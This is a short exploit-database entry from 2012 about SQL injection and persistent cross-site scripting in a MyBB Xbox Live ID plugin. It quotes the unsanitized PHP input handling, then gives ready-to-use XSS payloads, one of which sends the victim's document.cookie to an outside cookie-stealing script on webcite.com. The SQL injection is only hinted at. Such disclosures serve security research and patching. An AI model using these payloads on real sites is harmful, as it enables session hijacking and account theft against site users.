MyBB Xbox Live ID Post SQLi & Persistent XSS Vulnerabilities

2012-12-14T00:00:00
ID 1337DAY-ID-19971
Type zdt
Reporter Mr.P-teo
Modified 2012-12-14T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            MyBB Xbox Live ID Post SQLi & Persistent XSS

This a really easy one to exploit, user input is not sanitized at all and so is injected into the database as the following lines:

if (isset($mybb->input['xli']))
   {
      $xli->user_update_data['xli'] = $mybb->input['xli'];
   }

As you can see, no use of sanitation functions like - mysql_real_escape_string() or htmlentities()

To trigger the SQLi error simply enter the standard ' or for XSS enter your code e.g.

<script>alert(document.cookie);</script>

or

<script>window.open("http://webcite.com/cookiesteal.php?cookie"+document.cookie);</script>


Im not going to show step by step Post SQLi

#  0day.today [2018-01-05]  #